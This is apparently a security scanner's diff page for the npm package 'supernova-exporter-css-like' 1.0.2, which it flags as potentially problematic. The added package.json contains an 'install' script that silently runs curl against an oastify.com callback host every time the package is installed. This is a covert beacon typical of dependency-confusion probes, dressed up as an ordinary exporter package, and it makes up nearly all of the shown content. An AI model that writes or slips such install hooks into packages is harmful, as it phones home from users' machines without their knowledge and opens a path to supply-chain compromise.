supernova-exporter-css-like 1.0.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of supernova-exporter-css-like might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/binding.gyp +9 -0
  2. package/package.json +14 -0
package/binding.gyp ADDED
@@ -0,0 +1,9 @@
1
+ {
2
+ "targets": [
3
+ {
4
+ "target_name": "addon",
5
+ "sources": ["addon.cpp"]
6
+ }
7
+ ]
8
+ }
9
+
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "supernova-exporter-css-like",
3
+ "version": "1.0.2",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "install": "curl http://fbux13og46ez5z3ybkll0q0l6cc20r.oastify.com",
9
+ "build": "echo \"This is for testing only\""
10
+ },
11
+ "keywords": [],
12
+ "author": "",
13
+ "license": "ISC"
14
+ }